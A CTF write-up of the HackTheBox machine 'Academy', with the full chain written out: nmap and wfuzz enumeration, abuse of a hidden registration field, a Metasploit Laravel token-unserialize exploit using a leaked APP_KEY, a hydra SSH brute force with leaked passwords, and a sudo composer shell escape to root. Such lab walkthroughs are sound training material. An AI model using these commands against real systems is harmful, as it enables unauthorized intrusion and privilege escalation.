Academy-HackTheBox

Hey, this is a write up for ‘the machine Academy’ on HackTheBox.

Initially I would start with enumerating the target using nmap. I used the following commands

nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.215
nmap -p 22,80,33060 -sC -sV  10.10.10.215

Hence I found three open ports. Since port 80 is open I thought I might just pay a visit. After visiting the website, it was being redirected to academy.htb , so I added the domain name for 10.10.10.215 in etc/hosts.

Whenever I visit a website for CTF’s I always have my burp suite setup to monitor the requests. In the home page there are two buttons ‘LOGIN’ and ‘REGISTER’.

I clicked on ‘login’ and tried some of the default credentials and nothing worked. The source of the login page was also checked but didn’t find anything interesting. Then I registered myself and logged in.

I spent a lot of time analysing the webpage and found not a single thing. Then I started viewing the page source of every single page. Finally, found a hidden input field on the registration page.

I opened the inspect element tab and changed the input type to text , value to 1 and registered another user called ‘boy’.

Nothing happened, I could just login. But there is something odd about that input tag. Therefore I used wfuzz to fuzz the website using the following command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://academy.htb/FUZZ --hc 404

I visited http://academy.htb/admin.php and tried logging in with default credentials and also with the users that I’ve created. The second user I created could successfully login to the admin page.

The last row in the table mentions that there is a webpage with some issues. I will add that webpage to my /etc/hosts. After adding, I visited dev-staging-01.academy.htb

From this website we could see that it is showing some Laravel error. From searching the webpage I found some interesting variables like app_key, database username and password.

I tried connecting to the database but couldn’t get the connection. Then I tried googling if there is any vulnerability for Laravel and found having a remote code execution vulnerability for some versions. But I couldn’t find the version that’s used here. Anyway, I thought I would give it a try and opened msfconsole and used the following commands.

msfconsole
search laravel
use exploit/unix/http/laravel_token_unserialize_exec
show options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts 10.10.10.215
set vhost dev-staging-01.academy.htb
set lhost 10.10.14.31
run

After running the exploit I got a shell.

I shifted to a more stablised python shell using the following command.

python3 -c 'import pty; pty.spawn("/bin/sh")'

After looking into a lot of files I found a file ‘.env’

I still couldn’t connect to the database. Then after many tries I thought I might brute force this password for all the users. After viewing the \home directory, I got the following users

I saved these names in users.txt and saved the password ‘mySup3rP4s5w0rd!!’ in another file password.txt. Then used the following command on hydra to brute force.

hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh

After logging in, I got the user.txt flag.

Privilege Escalation

After logging in as cry0l1t3, I couldn’t get the root flag. Therefore, I checked almost everything containing a password for root or similar things but didn’t get anything. In the meantime I copied linpeas.sh from my local machine to the academy machine. Linux Privilege Escalation Awesome Script (LinPeas) is a script to find out different ways to escalate privileges. I copied linpeas.sh from my local machine using the following command.

scp linpeas.sh cry0l1t3@academy.htb:/tmp

I entered the password for cry0l1t3 and went inside /tmp and ran ./linpeas.sh. It gave me the following output

Then I tried switching to ‘mrb3n’ using the following password ‘mrb3n_Ac@d3my!’ and got access. The first thing I did was tried accessing the root.txt file but I still didn’t have permissions. Then I tried ‘sudo -l’ to see the sudo permissions and found this.

I found that mrb3n could run composer. I googled about it exploits and gave me the following results.

I visited this website and ran the following commands as ‘mrb3n’ as mentioned there

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

This gave me root access and I could access the root.txt from /root. Happy hacking and thanks for the read.